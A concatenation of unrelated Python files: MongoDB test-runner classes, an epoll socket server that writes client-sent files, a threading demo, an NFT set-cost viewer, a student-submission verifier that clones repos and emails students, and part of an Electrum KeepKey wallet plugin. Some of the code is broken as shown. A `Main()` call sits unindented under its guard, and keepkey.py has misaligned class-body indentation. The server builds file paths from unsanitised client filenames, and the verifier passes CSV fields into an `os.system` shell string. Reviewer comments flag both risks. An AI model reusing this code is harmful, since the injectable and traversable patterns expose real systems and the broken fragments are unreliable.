    def configure(self, fixture, num_clients=DEFAULT_CLIENT_NUM, *args, **kwargs):
        """
        Derives the shell's global_vars/TestData from the fixture and
        prepares a fresh data directory.
        """
        TestCase.configure(self, fixture, *args, **kwargs)
        if self.fixture.port is not None:
            self.shell_options["port"] = self.fixture.port
        global_vars = self.shell_options.get("global_vars", {}).copy()
        data_dir = self._get_data_dir(global_vars)
        # Set MongoRunner.dataPath if overridden at command line or not specified in YAML.
        if config.DBPATH_PREFIX is not None or "MongoRunner.dataPath" not in global_vars:
            # dataPath property is the dataDir property with a trailing slash.
            data_path = os.path.join(data_dir, "")
        else:
            data_path = global_vars["MongoRunner.dataPath"]
        global_vars["MongoRunner.dataDir"] = data_dir
        global_vars["MongoRunner.dataPath"] = data_path
        # Don't set the path to the executables when the user didn't specify them via the command
        # line. The functions in the mongo shell for spawning processes have their own logic for
        # determining the default path to use.
        if config.MONGOD_EXECUTABLE is not None:
            global_vars["MongoRunner.mongodPath"] = config.MONGOD_EXECUTABLE
        if config.MONGOS_EXECUTABLE is not None:
            global_vars["MongoRunner.mongosPath"] = config.MONGOS_EXECUTABLE
        if self.shell_executable is not None:
            global_vars["MongoRunner.mongoShellPath"] = self.shell_executable
        test_data = global_vars.get("TestData", {}).copy()
        test_data["minPort"] = core.network.PortAllocator.min_test_port(fixture.job_num)
        test_data["maxPort"] = core.network.PortAllocator.max_test_port(fixture.job_num)
        # Marks the main test when multiple test clients are run concurrently, to notify the test
        # of any code that should only be run once. If there is only one client, it is the main one.
        test_data["isMainTest"] = True
        global_vars["TestData"] = test_data
        self.shell_options["global_vars"] = global_vars
        shutil.rmtree(data_dir, ignore_errors=True)
        self.num_clients = num_clients
        try:
            os.makedirs(data_dir)
        except os.error:
            # Directory already exists.
            pass

    def _get_data_dir(self, global_vars):
        """
        Returns the value that the mongo shell should set for the
        MongoRunner.dataDir property.
        """
        # Command line options override the YAML configuration.
        data_dir_prefix = utils.default_if_none(config.DBPATH_PREFIX,
                                                global_vars.get("MongoRunner.dataDir"))
        data_dir_prefix = utils.default_if_none(data_dir_prefix, config.DEFAULT_DBPATH_PREFIX)
        return os.path.join(data_dir_prefix,
                            "job%d" % (self.fixture.job_num),
                            config.MONGO_RUNNER_SUBDIR)

    def run_test(self):
        """
        Runs the jstest, spawning one shell per client; re-raises the first
        exception captured by any client thread.
        """
        threads = []
        try:
            # Don't thread if there is only one client.
            if self.num_clients == 1:
                shell = self._make_process(self.logger)
                self._execute(shell)
            else:
                # If there are multiple clients, make a new thread for each client.
                # BUG FIX: `range` replaces the Python-2-only `xrange`.
                for i in range(self.num_clients):
                    t = self.ExceptionThread(my_target=self._run_test_in_thread, my_args=[i])
                    t.start()
                    threads.append(t)
        except self.failureException:
            raise
        except Exception:
            # Narrowed from a bare `except:` (E722); still re-raised.
            self.logger.exception("Encountered an error running jstest %s.", self.basename())
            raise
        finally:
            for t in threads:
                t.join()
        for t in threads:
            if t._get_exception() is not None:
                raise t._get_exception()

    def _make_process(self, logger=None, thread_id=0):
        # If logger is none, it means that it's not running in a thread and thus logger should be
        # set to self.logger.
        logger = utils.default_if_none(logger, self.logger)
        # Only the first client (thread 0) is marked as the main test.
        is_main_test = thread_id == 0
        return core.programs.mongo_shell_program(logger,
                                                 executable=self.shell_executable,
                                                 filename=self.js_filename,
                                                 isMainTest=is_main_test,
                                                 **self.shell_options)

    def _run_test_in_thread(self, thread_id):
        # Make a logger for each thread.
        logger = logging.loggers.new_logger(self.test_kind + ':' + str(thread_id),
                                            parent=self.logger)
        shell = self._make_process(logger, thread_id)
        self._execute(shell)
class MongosTestCase(TestCase):
    """
    A TestCase which runs a mongos binary with the given parameters.
    """

    def __init__(self,
                 logger,
                 mongos_options):
        """
        Initializes the mongos test and saves the options.
        """
        self.mongos_executable = utils.default_if_none(config.MONGOS_EXECUTABLE,
                                                       config.DEFAULT_MONGOS_EXECUTABLE)
        # Use the executable as the test name.
        TestCase.__init__(self, logger, "mongos", self.mongos_executable)
        self.options = mongos_options.copy()

    def configure(self, fixture, *args, **kwargs):
        """
        Ensures the --test option is present in the mongos options.
        """
        TestCase.configure(self, fixture, *args, **kwargs)
        # Always specify test option to ensure the mongos will terminate.
        if "test" not in self.options:
            self.options["test"] = ""

    def run_test(self):
        """
        Runs mongos; raises failureException on a non-zero exit.
        """
        try:
            mongos = self._make_process()
            self._execute(mongos)
        except self.failureException:
            raise
        except Exception:
            # BUG FIX: the original logged `mongos.as_command()` here, which
            # raises NameError when _make_process() itself fails (mongos is
            # unbound). Log the test name instead, matching the sibling
            # TestCase classes. Also narrowed from a bare `except:`.
            self.logger.exception("Encountered an error running %s.", self.basename())
            raise

    def _make_process(self):
        """
        Returns the mongos Process built from the saved options.
        """
        return core.programs.mongos_program(self.logger,
                                            executable=self.mongos_executable,
                                            **self.options)
# Maps the test-kind identifier (as used in suite configuration) to the
# TestCase subclass that knows how to run that kind of test.
_TEST_CASES = {
    "cpp_unit_test": CPPUnitTestCase,
    "cpp_integration_test": CPPIntegrationTestCase,
    "db_test": DBTestCase,
    "js_test": JSTestCase,
    "mongos_test": MongosTestCase,
}
|
server.py | from threading import Thread
from queue import Queue
from message import Message, MessageType
import socket
import select
class Connection:
    """Per-client state: the socket, a receive buffer, and the file (if any)
    currently being written from incoming File messages."""

    def __init__(self, _logger, socket, address="unknown", fileroot='/tmp'):
        self._logger = _logger
        self.socket = socket
        self.address = address
        # Create a buffer byte array for our client
        self.buffer = b""
        self.responses = {}
        # The open output file object, or False while no transfer is active.
        self.file = False
        self.fileroot = fileroot

    # Close our socket and cleanup
    def close(self):
        self.socket.close()
        # Close any open files
        if self.fileIsOpen():
            self.file.close()

    def processMessage(self, message):
        """Advance the file-transfer state machine for one parsed message."""
        # ### Process the message depending on what type of message it is
        if message.type == MessageType.FileStart:
            # If FileStart, open a new file for writing to
            # NOTE(review): message.filename is interpolated into the path
            # verbatim; a name containing '..' could escape fileroot —
            # confirm it is sanitized in Message.fromBytes.
            self.file = open(
                "{0}/{1}".format(self.fileroot, message.filename), "wb")
            self._logger.debug(
                "Opened: {}".format(message.filename))
        # Presumably MessageType.File is a collection/flag grouping all
        # file-carrying message types — confirm against message.py.
        if message.type in MessageType.File:
            # Check if a file was never opened for this connection
            if not self.fileIsOpen():
                raise RuntimeError("No file opened")
            # All File message types have a content, lets write that to the
            # file.
            self.file.write(message.content)
            self._logger.debug("Wrote {}.".format(
                message.content))
        # We can go ahead and close the file if we receive a FileEnd message
        if message.type == MessageType.FileEnd:
            self.file.close()

    def processBuffer(self, buffer):
        """Accumulate bytes and process every complete NUL-terminated packet."""
        # Add this events buffer to our overall buffer
        self.buffer += buffer
        # Our packets are terminated with a null terminator (\0).
        # If we find one we know we have received a whole packet.
        packetMarkerPosition = self.buffer.find(b'\0')
        while packetMarkerPosition != -1:
            try:
                # Extract our packet from the buffer
                messageBuffer = self.buffer[:packetMarkerPosition]
                # Attempt to convert our packet into a message
                message = Message.fromBytes(messageBuffer)
                self._logger.debug("Got a {} message!".format(message.type.name))
                self.processMessage(message)
            # If we have any issues running the above code, such as failing to
            # parse the incoming bytes into a valid message, we should log that
            # error.
            # NOTE(review): only RuntimeError is caught; other parse errors
            # from Message.fromBytes would propagate — confirm that is intended.
            except RuntimeError as err:
                self._logger.error(err)
            finally:
                # Trim the buffer of packet we just processed
                self.buffer = self.buffer[packetMarkerPosition + 1:]
                # Check if there is another whole packet in the buffer
                packetMarkerPosition = self.buffer.find(
                    b'\0')

    def recv(self, bufferSize):
        """Read from the socket; returns 0 on peer close, None otherwise.

        The caller treats a non-None return as a new epoll event mask
        (0 disables further events for this fd until EPOLLHUP cleanup).
        """
        buffer = self.socket.recv(bufferSize)
        # If we get an empty message, when know the communication channel
        # has been closed
        if len(buffer) == 0:
            self.shutdown()
            return 0
        self._logger.debug("Got bytes: {0}".format(buffer))
        self.processBuffer(buffer)
        return None

    def fileIsOpen(self):
        # True only while a FileStart has opened a file that is not yet closed.
        return self.file and not self.file.closed

    def shutdown(self):
        # Disable both directions; the epoll loop handles the ensuing HUP.
        self.socket.shutdown(socket.SHUT_RDWR)
class Server:
    """Single-threaded (per loop) epoll-based TCP server that receives
    NUL-terminated packets and delegates them to Connection objects."""

    def __init__(self, _logger, config):
        self._logger = _logger
        # Setup config with defaults
        self.config = {
            'file_root': '/tmp',
            'event_timeout': 0.2,
            'internal_recv_size': 8192
        }
        self.config.update(config)
        # This msgQueue can be used to communicate messages to the server thread
        # See the commented out section in run for more info
        self.msgQueue = Queue()
        # Open a new socket to listen on
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Set the socket to reuse old port if server is restarted
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # This is set to true when we want to end the server loop
        self.done = False

    def listen(self, port, addr='0.0.0.0'):
        """Bind to (addr, port) and run the event loop in a daemon-less
        background thread; returns the Thread handle."""
        # Sets the interface and port number for the socket to listen for connections
        # on.
        self.socket.bind((addr, port))
        self.socket.listen(1)
        # In order to prevent locking up the main thread, we start a new child thread.
        # This child thread will continously run the server's loop function and
        # check self.done periodically if to see if it should end
        thread = Thread(target=self.loop, args=())
        thread.start()
        self._logger.debug("Server listening on {}".format(port))
        # We will return the thread handle so that it can be acted on in the future
        return thread

    def close(self):
        # Signal the loop thread to exit on its next timeout tick.
        self.done = True

    def loop(self):
        """Epoll event loop: accepts clients, feeds received bytes to their
        Connection, and cleans up on hangup or shutdown."""
        connections = {}
        # See http://scotdoyle.com/python-epoll-howto.html for a detailed
        # explination on the epoll interface
        epoll = select.epoll()
        # We register our socket server in EPOLLIN mode to watch for incomming
        # connections.
        epoll.register(self.socket.fileno(), select.EPOLLIN)
        try:
            # Check if we should end our loop
            while not self.done:
                # This will return any new events
                events = epoll.poll(self.config['event_timeout'])
                # Process any new events
                for fileno, event in events:
                    # This handles a new connection
                    if fileno == self.socket.fileno():
                        client, address = self.socket.accept()
                        client.setblocking(0)
                        self._logger.info(
                            "New connection from {0}".format(address))
                        # Store our client in a connections dictionary
                        connections[client.fileno()] = Connection(self._logger, client, address, self.config['file_root'])
                        # Register incomming client connection with our epoll interface
                        epoll.register(client.fileno(), select.EPOLLIN)
                    # This event is called when there is data to be read in
                    elif event & select.EPOLLIN:
                        # Try to receive data from our client
                        # recv returns 0 (an empty event mask) after the peer
                        # closes; EPOLLHUP still fires afterwards for cleanup.
                        mode = connections[fileno].recv(self.config['internal_recv_size'])
                        if mode is not None:
                            epoll.modify(fileno, mode)
                        # Check if transmission is complete. In our case we are
                        # using an NULL termination (\0)
                        # Now that we know the transmission is complete, we should
                        # send a response (switch to send mode)
                        # if not buffers[fileno].endswith(b'\\\\0') and buffers[fileno].endswith(b'\\0'):
                        #     responses[fileno] = b'HTTP/1.0 200 OK\r\nDate: Mon, 1 Jan 1996 01:01:01 GMT\r\n'
                        #     responses[fileno] += b'Content-Type: text/plain\r\nContent-Length: 13\r\n\r\n'
                        #     responses[fileno] += b'Hello, world!'
                        #     epoll.modify(fileno, select.EPOLLOUT)
                        #     Server.parse_message(buffers[fileno])
                    # This event is called when there is data to be written out
                    elif event & select.EPOLLOUT:
                        pass
                        # # Send out our response
                        # numBytesWritten = connections[fileno].send(
                        #     responses[fileno])
                        # self._logger.debug("Sent response: {0}".format(
                        #     responses[fileno][:numBytesWritten]))
                        #
                        # # Truncate our response buffer (remove the part that is
                        # # already sent)
                        # responses[fileno] = responses[fileno][numBytesWritten:]
                        # self._logger.debug(responses[fileno])
                        #
                        # if len(responses[fileno]) == 0:
                        #     epoll.modify(fileno, select.EPOLLIN)
                    # Endpoint has closed the connection (No need to send shutdown)
                    elif event & select.EPOLLHUP:
                        self._logger.debug("Connection to [{}] closed!".format(connections[fileno].address))
                        epoll.unregister(fileno)
                        connections[fileno].close()
                        del connections[fileno]
        finally:
            # Close all open connections
            self._logger.debug("Closing all connections...")
            for fileno in connections:
                epoll.unregister(fileno)
                connections[fileno].close()
            # Unregister our server socket with our epoll
            epoll.unregister(self.socket.fileno())
            # Close our epoll
            epoll.close()
            # Close our socket server
            self.socket.close()
            self._logger.info("Server shutdown")
|
input_output_nums.py | #!/usr/bin/python
## This multithreading demo spawns five threads;
## each thread takes two numbers as input
## and prints their sum.
import threading
import time
def MyThread(num1, num2):
    """Print the two inputs followed by their integer sum."""
    print("Given Numbers: %s, %s" % (num1, num2))
    total = int(num1) + int(num2)
    print("Result: %d" % total)
def Main():
    """Start five worker threads and wait for all of them to finish.

    BUG FIX: the original collected the threads in a list but never joined
    them, so the process could exit while workers were still printing.
    """
    threads = []
    for i in range(5):
        t = threading.Thread(target=MyThread, args=(10, 20))
        threads.append(t)
        time.sleep(0.5)
        t.start()
    # Wait for every worker so output completes before the program exits.
    for t in threads:
        t.join()
if __name__ == '__main__':
Main()
|
sets.py | from cards import Cards
from ethereum import Ethereum
from json.decoder import JSONDecodeError
from opensea import OpenSea
from os.path import exists
from pushcontainer import push_container
from re import S
from singleton import Singleton
from threading import Thread
from time import time
import dearpygui.dearpygui as dpg
import json
import webbrowser
class Sets(metaclass=Singleton):
    """dearpygui window that shows, per configured "ParaSet", which tokens the
    wallet owns and what completing each set would cost (via OpenSea listings)."""

    # Placeholder Ethereum address used to denote "no address".
    NullAddress = "0x0000000000000000000000000000000000000000"

    def __init__(self, width, height, cards:Cards, walletAddress, contractAddress, logInfoCallback, logErrorCallback, dataFile='sets.json'):
        """Load set definitions from dataFile and build the (hidden) window."""
        self.cards = cards
        self.walletAddress = walletAddress
        self.contractAddress = contractAddress
        self.window = dpg.generate_uuid()
        self.totalETHText = dpg.generate_uuid()
        self.totalUSDText = dpg.generate_uuid()
        self.table = dpg.generate_uuid()
        self.dataFile = dataFile
        # Mapping: set name -> list of token ids belonging to that set.
        self.data = {}
        self.setNames = []
        self.columnsIdsByName = {}
        # Epoch seconds of the last refresh; throttles auto-updates in Show().
        self.lastUpdateTime = 0
        self.logInfoCallback = logInfoCallback
        self.logErrorCallback = logErrorCallback
        self.LoadSetData()
        with dpg.window(id=self.window, label="ParaSets", width=width, height=height, show=False):
            dpg.add_button(label="Refresh", callback=lambda: self.Update())
            self.InitTable()

    def LoadSetData(self):
        """Populate self.data from the 'parasets' key of the JSON data file."""
        if exists(self.dataFile):
            with open(self.dataFile, "r") as f:
                try:
                    self.data = json.load(f)['parasets']
                    self.logInfoCallback(f"{self.dataFile} loaded.")
                except JSONDecodeError as e:
                    self.logErrorCallback(f"{self.dataFile} load failed because: {str(e)}")
        else:
            self.logErrorCallback(f"{self.dataFile} is missing.")
            self.data = {}

    def InitTable(self):
        """Create the table widget with one column per set; returns its id."""
        t = dpg.add_table(
            id=self.table,
            parent=self.window,
            header_row=True,
            sortable=True,
            reorderable=True,
            resizable=True,
            no_host_extendX=True,
            policy=dpg.mvTable_SizingStretchProp)
        with push_container(t) as table:
            self.setNames = sorted(self.data)
            for s in self.setNames:
                self.columnsIdsByName[s] = dpg.add_table_column(label=s, no_sort=True, default_sort=True, prefer_sort_descending=True)
        return table

    def Show(self):
        """Show the window; refresh in the background if data is >5 min old."""
        dpg.configure_item(self.window, show=True)
        if (time() - self.lastUpdateTime >= 60 * 5):
            Thread(target=self.Update, daemon=True).start()

    def Update(self):
        """Rebuild the table from current OpenSea listings and wallet holdings."""
        # Recreate the table so stale cells are discarded.
        if dpg.does_item_exist(self.table):
            dpg.delete_item(self.table)
            self.table = self.InitTable()
        ethInFiat = Ethereum.GetEthInFiat(1.0)
        ownedAssets = OpenSea.GetAssets(self.walletAddress, self.contractAddress, logInfoCallback=self.logInfoCallback, logErrorCallback=self.logErrorCallback)
        self.lastUpdateTime = time()
        ownedTokens = set([int(a['token_id']) for a in ownedAssets])
        missingPriceBySet = {}
        setPriceBySet = {}
        priceByToken = {}
        with push_container(self.table):
            for setName in sorted(self.data):
                tokensInSet = set(self.data[setName])
                setAssets = OpenSea.GetAssets(
                    walletAddress=None,
                    contractAddress=self.contractAddress,
                    logInfoCallback=self.logInfoCallback,
                    logErrorCallback=self.logErrorCallback,
                    tokens=list(tokensInSet))
                unavailableTokens = []
                missingTokens = tokensInSet - ownedTokens
                missingPriceEth = 0.0
                setPriceEth = 0.0
                # Tally lowest-listing prices for the whole set and for the
                # subset of tokens the wallet is still missing.
                for asset in setAssets:
                    # NOTE: `id` shadows the builtin here.
                    id = int(asset['token_id'])
                    sell_orders = asset['sell_orders']
                    tokenIsMissing = id in missingTokens
                    if sell_orders:
                        _, lPrice, __ = OpenSea.GetPrices(sell_orders[0])
                        if (tokenIsMissing):
                            missingPriceEth += lPrice
                        # whether owned or not, add it to the set price
                        priceByToken[id] = lPrice
                        setPriceEth += lPrice
                    else:
                        priceByToken[id] = 0
                        unavailableTokens.append(id)
                        self.logInfoCallback(f"Sets: no listing found for [{id}] {asset['name']} {asset['permalink']}")
                missingPriceBySet[setName] = missingPriceEth
                setPriceBySet[setName] = setPriceEth
                for tokenId in tokensInSet:
                    # default is medium grey
                    color = (150,150,150)
                    if tokenId in ownedTokens:
                        # white
                        color = (255,255,255)
                    # NOTE(review): (255,255,0) is yellow, not purple, and this
                    # condition is identical to the next one, so the red
                    # assignment below always overrides it (dead branch). The
                    # original comment suggests this was meant to test
                    # "owned AND unlisted" — confirm intent before changing.
                    if tokenId in unavailableTokens:
                        color = (255,255,0)
                    if tokenId in unavailableTokens:
                        # red
                        color = (255,0,0)
                    # get the name of the card
                    token = str(tokenId)
                    if self.cards.Has(token):
                        text = self.cards.Get(token)['name']
                    else:
                        text = tokenId
                    # NOTE(review): Get() is called even when Has() was False —
                    # confirm Cards.Get tolerates unknown tokens.
                    card = self.cards.Get(token)
                    dpg.add_button(label="o", user_data=card['link'], callback=lambda _,__,url: webbrowser.open_new_tab(url))
                    dpg.add_same_line()
                    txt = dpg.add_text(default_value=text, color=color)
                    tt = dpg.add_tooltip(parent=txt)
                    dpg.add_text(default_value=f"[{tokenId}] {card['name']}", parent=tt, color=(212,175,55))
                    dpg.add_text(default_value=f"Properties:", parent=tt, color=(0,255,255))
                    for trait in self.cards.Get(token)['traits']:
                        dpg.add_text(default_value=f"    {card['traits'][trait]}", parent=tt)
                    if tokenId in priceByToken:
                        missingTokenPrice = priceByToken[tokenId]
                        dpg.add_text(default_value="Current Token Price:", parent=tt, color=(0,255,255))
                        dpg.add_text(default_value=f"    ETH {missingTokenPrice:0,.4f}", parent=tt)
                        dpg.add_text(default_value=f"    USD ${missingTokenPrice * ethInFiat:0,.2f}", parent=tt)
                    dpg.add_text(default_value="Set Completion Costs:", parent=tt, color=(0,255,255))
                    dpg.add_text(default_value=f"    ETH {missingPriceEth:0,.4f}", parent=tt)
                    dpg.add_text(default_value=f"    USD ${(missingPriceEth * ethInFiat):0,.2f}", parent=tt)
                    dpg.add_text(default_value="Full Set Cost (Lowest Listings):", parent=tt, color=(0,255,255))
                    dpg.add_text(default_value=f"    ETH {setPriceEth:0,.4f}", parent=tt)
                    dpg.add_text(default_value=f"    USD ${(setPriceEth * ethInFiat):0,.2f}", parent=tt)
                    if unavailableTokens:
                        dpg.add_text(default_value="Unavailable Tokens:", parent=tt, color=(255,0,0))
                        for t in unavailableTokens:
                            dpg.add_text(default_value=f"    {self.cards.Get(str(t))['name']}", parent=tt, color=(255,0,0))
                dpg.add_table_next_column()
|
verification.py | import datetime
from email.mime.text import MIMEText
import csv
import smtplib
from optparse import OptionParser
import os
from Queue import Queue
from threading import Thread
def eliminate_duplicates(csv_file, eid_index, time_index):
    """Return one row per student EID: the latest submission by timestamp.

    csv_file   -- iterable of CSV rows (sequences of strings)
    eid_index  -- column index of the student EID
    time_index -- column index of a 'M/D/YYYY H:M:S' submission timestamp
    """
    student_dict = {}
    # BUG FIX: iterate the csv_file parameter. The original looped over the
    # global name `csv`, which only worked because the caller happened to
    # rebind the `csv` module to its reader object.
    for csv_line in csv_file:
        eid = csv_line[eid_index]
        dt = csv_line[time_index]
        date, time = dt.split()
        mon, day, year = [int(i) for i in date.split('/')]
        hour, minute, second = [int(i) for i in time.split(':')]
        sub_time = datetime.datetime(year, mon, day, hour, minute, second)
        # Keep only the most recent submission seen for each student.
        if eid not in student_dict or student_dict[eid]['datetime'] < sub_time:
            student_dict[eid] = {'csv_line': csv_line, 'datetime': sub_time}
    return [student_dict[eid]['csv_line'] for eid in student_dict]
def pull(csvLine, uteid_index, url_index, sha_index):
    """Clone the student's repo into a directory named after their EID and
    check out the submitted SHA; returns csvLine unchanged for chaining.

    SECURITY NOTE(review): the EID, URL, and SHA come straight from the CSV
    and are concatenated into a shell command — a crafted field can inject
    arbitrary commands via os.system. Consider subprocess.run([...]) with
    shell=False if the CSV is not fully trusted.
    """
    os.system('mkdir ' + csvLine[uteid_index] + ';' +
              'cd ' + csvLine[uteid_index] + ';' +
              'git init;' +
              'git remote add origin ' + csvLine[url_index] + ';' +
              'git pull;' +
              'git checkout ' + csvLine[sha_index] + ';')
    return csvLine
def check(files, direct):
    """Return a 'does not exist' message for each required file missing
    under the directory *direct*."""
    return [f + ' does not exist'
            for f in files
            if not os.path.exists(direct + '/' + f)]
def email(email, password, smtpServer, to, cc, subject, eid, msg):
    """Email the student (CC the graders) about missing files.

    email/password -- sender credentials; smtpServer -- SMTP host
    to  -- student address; cc -- non-empty list of CC addresses
    eid -- student EID; msg -- list of problem lines to include
    """
    message = "From: " + email + "\nTo: " + to + "\nCC: "
    # Equivalent to the original index loop, but also safe for an empty list.
    message += ','.join(cc)
    message += '\nSubject:' + '[CS371p] ' + subject + '\n\n'
    message += 'This is an automated message, please contact the graders if you have questions.\n\n'
    message += 'EID: ' + eid + '\n'
    for m in msg:
        message += m + '\n'
    message += '\nPlease push these files to your repo and notify the graders ASAP.\n\nCS371p Graders'
    smtp = smtplib.SMTP(smtpServer)
    smtp.starttls()
    smtp.login(email, password)
    # BUG FIX: the original passed `[to] + [cc]`, nesting the cc list inside
    # the recipient list; smtplib expects a flat list of address strings.
    smtp.sendmail(email, [to] + cc, message)
    smtp.quit()
if __name__=='__main__':
    # Pipeline: csvq -> pull -> dirq -> check -> (probq for emails, outputq for
    # the results CSV). Each stage runs in its own thread below.
    csvq = Queue()
    dirq = Queue()
    probq = Queue()
    outputq = Queue()
    parser = OptionParser()
    parser.add_option('-f', dest='csv_file', help='csv file to be read')
    parser.add_option('-u', dest='user', help='email address')
    parser.add_option('-p', dest='passw', help='email password')
    parser.add_option('--smtp', dest='smtp', help='smtp server')
    parser.add_option('--cc', dest='cc', help='email cc\'s')
    parser.add_option('--files', dest='files', help='required files')
    parser.add_option('--csv_time', dest='csv_time', help='csv time column index')
    parser.add_option('--csv_eid', dest='csv_eid', help='csv eid column index')
    parser.add_option('--csv_email', dest='csv_email', help='csv email column index')
    parser.add_option('--csv_url', dest='csv_url', help='csv url column index')
    parser.add_option('--csv_sha', dest='csv_sha', help='csv sha column index')
    (option, args) = parser.parse_args()
    csv_file_name = option.csv_file
    email_addr = option.user
    password = option.passw
    smtp = option.smtp
    subject = 'Missing files'
    cc = option.cc.split(',')
    files = option.files.split(',')
    csv_time = int(option.csv_time)
    csv_eid = int(option.csv_eid)
    csv_email = int(option.csv_email)
    csv_url = int(option.csv_url)
    csv_sha = int(option.csv_sha)
    print 'option list:', parser.option_list
    print 'Csv file:', csv_file_name
    print 'Email sending:', email_addr
    print 'CC\'d:', cc
    print 'Smtp server:', smtp
    print 'Required files:', files
    print 'Index of time:', csv_time
    print 'Index of eid:', csv_eid
    print 'Index of email:', csv_email
    print 'Index of project url:', csv_url
    print 'Index of sha:', csv_sha
    # read in all of the lines of the csv
    clean_csv = []
    with open(csv_file_name, "rb") as csv_file:
        # NOTE(review): this rebinds the `csv` MODULE name to a reader object,
        # shadowing the import; eliminate_duplicates depends on receiving this
        # reader as its argument.
        csv = csv.reader(csv_file, delimiter=",")
        clean_csv = eliminate_duplicates(csv, csv_eid, csv_time)
    # put all of the clean lines into the first queue
    # Sentinel that tells each pipeline stage there is no more work.
    END = '______________NO_MORE_LINES'
    for line in clean_csv:
        csvq.put(line)
    csvq.put(END)
    # wrapper for pulling the projects
    def pull_projects():
        """Consume csvq: clone/check out each submission, feed dirq."""
        run = True
        while run:
            csv_line = csvq.get()
            if csv_line != END:
                out_val = pull(csv_line, csv_eid, csv_url, csv_sha)
                dirq.put(out_val)
            else:
                dirq.put(END)
                run = False
            csvq.task_done()
    # wrapper for checking the projects
    def check_files():
        """Consume dirq: verify required files, route problems and results."""
        run = True
        while run:
            csv_line = dirq.get()
            if csv_line != END:
                direct = csv_line[csv_eid]
                message = check(files, direct)
                if len(message) > 0:
                    probq.put((csv_line, message))
                    outputq.put((csv_line, message))
                else:
                    outputq.put((csv_line, ['OK to grade']))
            else:
                run = False
                probq.put(END)
                outputq.put(END)
            dirq.task_done()
    # wrapper for emailing the projects
    def email_missing():
        """Consume probq: email each student whose submission has problems."""
        run = True
        while run:
            in_val = probq.get()
            if in_val != END:
                csv_line, message = in_val
                email(email_addr, password, smtp, csv_line[csv_email], cc, subject, csv_line[csv_eid], message)
            else:
                run = False
            probq.task_done()
    f = open('validation_results.csv', 'wb')
    def write():
        """Consume outputq: append one result row per submission to the CSV."""
        run = True
        while run:
            in_val = outputq.get()
            if in_val != END:
                csv_line, message = in_val
                output_string = csv_line[csv_time] + ',' + csv_line[csv_eid] + ','
                for m in message:
                    output_string += m + ';'
                output_string += ', ' + csv_line[csv_url] + ',' + csv_line[csv_sha] + '\n'
                f.write(output_string)
                print output_string
            else:
                run = False
            outputq.task_done()
    pulling_thread1 = Thread(target = pull_projects)
    checking_thread = Thread(target = check_files)
    emailing_thread = Thread(target = email_missing)
    output_thread = Thread(target = write)
    pulling_thread1.start()
    checking_thread.start()
    emailing_thread.start()
    output_thread.start()
    pulling_thread1.join()
    checking_thread.join()
    emailing_thread.join()
    output_thread.join()
    f.close()
    print "done"
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
    """Hardware keystore backed by a KeepKey device."""
    hw_type = 'keepkey'
    device = 'KeepKey'

    def get_derivation(self):
        # BIP32 derivation path prefix configured for this keystore.
        return self.derivation

    def get_client(self, force_pair=True):
        # Delegates to the plugin, which owns device pairing.
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        # KeepKey does not support message decryption in this plugin.
        raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign *message* on-device at derivation <prefix>/<change>/<index>."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """Collect previous transactions and xpub paths, then let the plugin
        drive the on-device signing flow. No-op for already-complete txs."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            # Legacy inputs need the full previous tx for on-device checking.
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
    def __init__(self, parent, config, name):
        """Set up the plugin; marks libraries_available=False if the optional
        python-keepkey package cannot be imported."""
        HW_PluginBase.__init__(self, parent, config, name)
        try:
            from . import client
            import keepkeylib
            import keepkeylib.ckd_public
            import keepkeylib.transport_hid
            import keepkeylib.transport_webusb
            self.client_class = client.KeepKeyClient
            self.ckd_public = keepkeylib.ckd_public
            self.types = keepkeylib.client.types
            self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
                               keepkeylib.transport_webusb.DEVICE_IDS)
            self.device_manager().register_devices(self.DEVICE_IDS)
            self.libraries_available = True
        except ImportError:
            # python-keepkey is optional; the plugin degrades gracefully.
            self.libraries_available = False
    def hid_transport(self, pair):
        """Return a HID transport for the given (path, path) device pair."""
        from keepkeylib.transport_hid import HidTransport
        return HidTransport(pair)
    def webusb_transport(self, device):
        """Return a WebUSB transport for *device*.

        Prefers an enumerated device whose serial number prefixes device.id_;
        falls back to constructing a transport from *device* directly.
        """
